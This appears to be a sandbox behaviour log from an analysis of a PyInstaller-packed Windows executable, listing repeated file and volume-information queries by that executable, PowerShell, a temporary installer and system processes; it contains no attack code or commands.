Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\win32 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\_queue.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\_hashlib.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\_ssl.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\Pythonwin VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\pywin32_system32 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\_asyncio.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\_overlapped.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002\pyexpat.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65002 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeQueries volume information: C:\Users\user\Desktop\3Af7PybsUi.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeQueries volume information: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.ba\SideBar.png VolumeInformationJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeQueries volume information: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.ba\SideBar.png VolumeInformationJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeQueries volume information: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.ba\SideBar.png VolumeInformationJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeQueries volume information: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.ba\SideBar.png VolumeInformationJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeQueries volume information: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.ba\SideBar.png VolumeInformationJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeQueries volume information: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.ba\SideBar.png VolumeInformationJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeQueries volume information: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.ba\SideBar.png VolumeInformationJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeQueries volume information: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.ba\SideBar.png VolumeInformationJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeQueries volume information: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.ba\SideBar.png VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
